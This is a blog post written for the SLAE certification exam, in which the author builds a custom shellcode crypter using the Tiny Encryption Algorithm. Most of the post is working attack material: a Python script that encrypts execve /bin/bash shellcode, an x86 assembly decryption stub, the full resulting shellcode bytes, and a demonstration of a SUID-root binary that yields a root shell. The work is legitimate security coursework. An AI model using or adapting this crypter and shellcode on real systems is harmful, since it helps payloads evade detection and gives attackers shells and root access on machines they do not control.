Address
304 North Cardinal St.
Dorchester Center, MA 02124
Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM
Address
304 North Cardinal St.
Dorchester Center, MA 02124
Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM
Assignment #7, and the final assignment, for the SLAE exam is to create a custom shellcode crypter.
First, the requirements for assignment #7 were as follows.
Create a custom crypter like the one shown in the "crypters" video Free to use any existing encryption scheme Can use any programming language
In this case, I decided to use assembly as my programming language. This entire course was about assembly, so it felt funny to do the last assignment in another language completely. That said, I did end up writing my encryption script in Python. I originally wrote most of it in Assembly, but realized that it would be obnoxious to handle my printing and modification easily.
Using assembly instead of another language also affords me a few advantages.
With the decision made, let’s jump into my algorithm choice!
Due to my decision to write my decrypter in assembly, I had to find a fairly simple algorithm.
First, I attempted to go with AES, and use the AES-NI instructions. Unfortunately, this proved a little more difficult than I originally planned. Additionally, I wanted my code to work on all processors, even if they didn’t support the instruction set.
After a bit more searching, I stumbled upon the Tiny Encryption Algorithm.
While not the most secure encryption algorithm, it is still decent enough for my use. That, and it is a fairly simple algorithm, taking only 11 lines of C code for the decrypt method.
For more information on the Tiny Encryption Algorithm, I highly recommend the following paper(s).
The XTEA algorithm is a bit more secure, but slightly longer and harder to code. As I wasn’t going for the most secure algorithm, I figured that I would be fine with the original.
For reference, here is the decrypt method that I will be implementing in assembly.
void decrypt (uint32_t* v, uint32_t* k) { uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i; /* set up */ uint32_t delta=0x9e3779b9; /* a key schedule constant */ uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */ for (i=0; i<32; i++) { /* basic cycle start */ v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3); v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1); sum -= delta; } /* end cycle */ v[0]=v0; v[1]=v1; }
With my algorithm selected, it was time to write my encryption script.
As I mentioned before, I started out writing this in assembly as well. That said, when it came time to get my encrypted shellcode and output it cleanly, things got messy.
In that case, I ended up switching to Python.
You can find my script below, and I’ve commented it where necessary. All of the math isn’t in the comments here, but you can find it in the decryption program’s comments.
Also, the numpy uint32/int32 methods definitely saved me when it came to longs and wrapping around. That said, I’m not sure if I’m using them too often or not often enough. The encryption works as expected though, so that’s good enough for me!
#!/usr/bin/python import struct import numpy as np import warnings # https://en.wikipedia.org/wiki/Tiny_Encryption_Algorithm def encrypt(data, key): delta = int("0x9e3779b9", 0) sum = np.int32(0) y = np.uint32(struct.unpack("I", data[0:4])[0]) z = np.uint32(struct.unpack("I", data[4:8])[0]) #print "Y: " + str(y) #print "Z: " + str(z) k0 = struct.unpack("I", key[0:4])[0] k1 = struct.unpack("I", key[4:8])[0] k2 = struct.unpack("I", key[8:12])[0] k3 = struct.unpack("I", key[12:16])[0] for n in range(0, 32): sum += delta sum = np.int32(sum) #print "SUM #" + str(n) + ": " + str(sum) q = ((z << 4) + k0) ^ (z + sum) ^ ((z >> 5) + k1) r = ((z << 4) + k0) s = z + sum t = ((z >> 5) + k1) #print "First sum: " + '0x{:08x}'.format(r % 4294967295) #print "Second sum: " + '0x{:08x}'.format(s % 4294967295) #print "XOR: " + '0x{:08x}'.format((r ^ s) % 4294967295) #print "Second shift: " + '0x{:08x}'.format((z >> 5) % 4294967295) #print "Key1: " + '0x{:08x}'.format((k1) % 4294967295) #print "Third sum: " + '0x{:08x}'.format((t) % 4294967295) #print "Final XOR: " + '0x{:08x}'.format((r ^ s ^ t) % 4294967295) y += np.uint32(((z << 4) + k0) ^ (z + sum) ^ ((z >> 5) + k1)) z += np.uint32(((y << 4) + k2) ^ (y + sum) ^ ((y >> 5) + k3)) #print "FINAL SUM: " + '0x{:08x}'.format(sum % 4294967295) #print '0x{:08x}'.format(y % 4294967295) #print '0x{:08x}'.format(z % 4294967295) #print k0 #print k1 #print k2 #print k3 return (y, z) def main(): # Execve-stack # https://www.doyler.net/security-not-included/execve-shellcode-generator shellcode = "\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" # Randomly generated key key = "WQVh8{7C?gE_B<d$" crypted = [] output = '' # Ignore all warnings # This is for the overflow occasionally caused by the unsigned integer addition warnings.filterwarnings("ignore") # Pad the shellcode length to be divisible by 8, makes encrypting/decrypting easier while not (len(shellcode) % 8 == 0): shellcode += "\x90" # Encrypt each word pair in the shellcode for x in range(0, len(shellcode) / 8): y, z = encrypt(shellcode[8*x:8*(x+1)], key) crypted.append(y) crypted.append(z) # Combine the shellcode into a printable string for word in crypted: output += ''.join(map(lambda c:'\\x%02x'%c, map(ord, struct.pack('L', word)))) print "\nEncrypted Shellcode" print "Length: " + str(len(shellcode)) + " bytes" print "--------------------------------" print output print "" print "\nASM ready: \n" + output.replace('\\', ', 0')[2:] print if __name__ == '__main__': main()
With the script completed, I generated my encrypted shellcode.
doyler@slae:~/slae/_exam/crypter$ python tea_encrypt.py Encrypted Shellcode Length: 32 bytes -------------------------------- \x32\x8d\xc9\x7c\x7a\x8a\xe7\x47\x6b\x2a\x09\x6c\xe8\xcd\x32\x05\x89\xa0\xc0\x1a\x59\x71\x89\x4a\x06\xff\x7d\xbd\xdd\x64\x15\x48 ASM ready: 0x32, 0x8d, 0xc9, 0x7c, 0x7a, 0x8a, 0xe7, 0x47, 0x6b, 0x2a, 0x09, 0x6c, 0xe8, 0xcd, 0x32, 0x05, 0x89, 0xa0, 0xc0, 0x1a, 0x59, 0x71, 0x89, 0x4a, 0x06, 0xff, 0x7d, 0xbd, 0xdd, 0x64, 0x15, 0x48
With my shellcode encrypted, I began writing my decryption program in assembly.
This wasn’t terribly complicated, but definitely took plenty of mental gymnastics. Keeping all of my variables separate, where I wanted them, and saving/retrieving them took some effort. That said, this is probably the assignment I’m most proud of.
I’ve added plenty of comments to the final code, including a line by line description of the math. As this is my full decryption program, I also included the key. That said, in a real world scenario, you definitely wouldn’t want to do this. For example, if you had local access, accepting it via STDIN would be better.
You can find my code below, but feel free to reach out if you have any questions, concerns, or suggestions.
; Filename: tea_decrypt.nasm ; Author: Ray Doyle ; Website: https://www.doyler.net ; ; Purpose: SLAE Exam Assignment #7 - Custom Shellcode Crypter (Linux/x86) using the Tiny Encryption Algorithm - 148 bytes ; Algorithm: https://en.wikipedia.org/wiki/Tiny_Encryption_Algorithm section .text global _start _start: jmp call_decrypt pre_decrypt: ; JMP-CALL-POP to get EAX pointing to the encrypted shellcode pop eax ; Point EDX to the decryption key lea edx, [eax + 0x21] ; Push EAX onto the stack to keep track of where in the shellcode the decryption routine is push eax decrypt: ; Move the saved address into EAX ; Note that this isn't necessary for the first loop, but doesn't change the functionality mov eax, [esp] ; Check to see if we're at the end of the shellcode ; If so, decryption is complete, so jump to the decrypted shellcode cmp byte [eax], 0xAA je EncryptedShellcode ; Load the first word of the encrypted shellcode into ESI mov esi,[eax] ; Load the second word into EDI mov edi,[eax+0x4] ; Begin the counter for the decrypt loop ; Note that 0x9e3779b9 >> 5 = 0xc6ef3720 mov ecx, 0xc6ef3720 decrypt_loop: ; ; Calculate decrypted word #2 (v1) ; mov ebx,esi ; (v0 << 4) shl ebx,0x4 ; (v0 << 4) + k2 add ebx,[edx+0x8] ; (v0 + sum) lea eax,[esi+ecx*1] ; (v0 << 4) + k2) ^ (v0 + sum) xor ebx,eax mov eax,esi ; (v0 >> 5) shr eax,0x5 ; (v0 >> 5) + k3 add eax,[edx+0xc] ; ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3) xor ebx,eax ; sum -= delta sub edi, ebx ; ; Calculate decrypted word #1 (v0) ; mov ebx,edi ; (v1 << 4) shl ebx,0x4 ; (v1 << 4) + k0 add ebx,[edx] ; (v1 + sum) lea eax,[edi+ecx*1] ; (v1 << 4) + k02) ^ (v1 + sum) xor ebx,eax mov eax,edi ; (v1 >> 5) shr eax,0x5 ; (v1 >> 5) + k1 add eax,[edx+0x4] ; ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1) xor ebx,eax ; sum -= delta sub esi, ebx ; Subtract delta from the sum and loop ; Note that ECX will only be zero after 32 iterations sub ecx, 0x9e3779b9 jnz decrypt_loop ; Retrieve stored EAX from the stack pop eax ; Replace encrypted shellcode word's with decrypted versions mov [eax],esi mov [eax+0x4],edi ; Add 8 to EAX to begin decrypting the next two words add eax, 0x8 ; Save the modified EAX onto the stack push eax jmp short decrypt call_decrypt: call pre_decrypt ; Encrypted shellcode + marker byte (0xaa) EncryptedShellcode db 0x32, 0x8d, 0xc9, 0x7c, 0x7a, 0x8a, 0xe7, 0x47, 0x6b, 0x2a, 0x09, 0x6c, 0xe8, 0xcd, 0x32, 0x05, 0x89, 0xa0, 0xc0, 0x1a, 0x59, 0x71, 0x89, 0x4a, 0x06, 0xff, 0x7d, 0xbd, 0xdd, 0x64, 0x15, 0x48, 0xAA ; Decryption key ; NOTE: THIS SHOULDN'T BE HARDCODED IN AN ACTUAL APPLICATION key db "WQVh8{7C?gE_B<d$"
With my decryption routine complete, it was time to test everything out.
First, I compiled and linked my assembly.
doyler@slae:~/slae/_exam/crypter$ ./compile.sh tea_decrypt [+] Assembling with Nasm ... [+] Linking ... [+] Done!
Next, I obtained the shellcode. Note that I had to use this one-liner or change the old one. The reason for this is that some of the objdump lines contained 7 instructions instead of 6.
doyler@slae:~/slae/_exam/crypter$ for i in $(objdump -d tea_decrypt |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo \xeb\x5c\x58\x8d\x50\x21\x50\x8b\x04\x24\x80\x38\xaa\x74\x54\x8b\x30\x8b\x78\x04\xb9\x20\x37\xef\xc6\x89\xf3\xc1\xe3\x04\x03\x5a\x08\x8d\x04\x0e\x31\xc3\x89\xf0\xc1\xe8\x05\x03\x42\x0c\x31\xc3\x29\xdf\x89\xfb\xc1\xe3\x04\x03\x1a\x8d\x04\x0f\x31\xc3\x89\xf8\xc1\xe8\x05\x03\x42\x04\x31\xc3\x29\xde\x81\xe9\xb9\x79\x37\x9e\x75\xc7\x58\x89\x30\x89\x78\x04\x83\xc0\x08\x50\xeb\xa9\xe8\x9f\xff\xff\xff\x32\x8d\xc9\x7c\x7a\x8a\xe7\x47\x6b\x2a\x09\x6c\xe8\xcd\x32\x05\x89\xa0\xc0\x1a\x59\x71\x89\x4a\x06\xff\x7d\xbd\xdd\x64\x15\x48\xaa\x57\x51\x56\x68\x38\x7b\x37\x43\x3f\x67\x45\x5f\x42\x3c\x64\x24
Finally, I compiled my shellcode wrapper application.
doyler@slae:~/slae/_exam/crypter$ vi shellcode.c doyler@slae:~/slae/_exam/crypter$ gcc -o shellcode -z execstack -fno-stack-protector shellcode.c
Before running my application, I verified that only one instance of bash was running.
doyler@slae:~/slae/_exam/crypter$ ps PID TTY TIME CMD 4014 pts/6 00:00:01 bash 15170 pts/6 00:00:00 ps
Upon execution, I received a new bash process, and with only 148 bytes of shellcode!
doyler@slae:~/slae/_exam/crypter$ ./shellcode Shellcode Length: 148 doyler@slae:/home/doyler/slae/_exam/crypter$ ps PID TTY TIME CMD 4014 pts/6 00:00:01 bash 15171 pts/6 00:00:00 bash 15227 pts/6 00:00:00 ps doyler@slae:/home/doyler/slae/_exam/crypter$ exit exit
As an added bonus, I made the binary SUID root for some privilege escalation fun.
doyler@slae:~/slae/_exam/crypter$ sudo chown root:root shellcode doyler@slae:~/slae/_exam/crypter$ sudo chmod 4755 shellcode doyler@slae:~/slae/_exam/crypter$ ps PID TTY TIME CMD 9741 pts/9 00:00:00 bash 13370 pts/9 00:00:00 ps doyler@slae:~/slae/_exam/crypter$ ./shellcode Shellcode Length: 148 # id uid=1000(doyler) gid=1000(doyler) euid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(doyler) # exit
This was an awesome assignment, and I’m proud of myself for writing the final application in x86 assembly.
I actually found another SLAE student who used the same algorithm. That said, they actually have a bug in their code! The logic for their encryption/decryption is wrong, as you can see below. That said, they used the formula in both directions, so it technically doesn’t matter.
y += (z << 4) + (key[0]^z) + (sum^(z >> 5)) + key[1]; z += (y << 4) + (key[2]^y) + (sum^(y >> 5)) + key[3];
There was also a post about implementing the encryption routine in x86 (AT&T). This helped me organize a few of my registers when I got stuck about halfway through.
Also, while I don’t have the output here, I finally installed PEDA on my SLAE box during this assignment. While not terribly necessary, I needed the vmmap call a few times to make sure that memory was actually writable.
This was a great course, and I look forward to finishing up my review. I also plan on posting some/most/all of my shellcodes to shell-storm and/or Exploit DB, so be on the lookout.
Finally, you can find the code and updates in my GitHub repository.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification:
http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert
Student-ID: SLAE-1212
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!
He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.
This page contains links to products that I may receive compensation from at no additional cost to you. View my Affiliate Disclosure page here. As an Amazon Associate, I earn from qualifying purchases.
[…] Custom Shellcode Crypter – SLAE Exam Assignment #7 […]
[…] finished up my SLAE course a few weeks ago, and got my passing notification last […]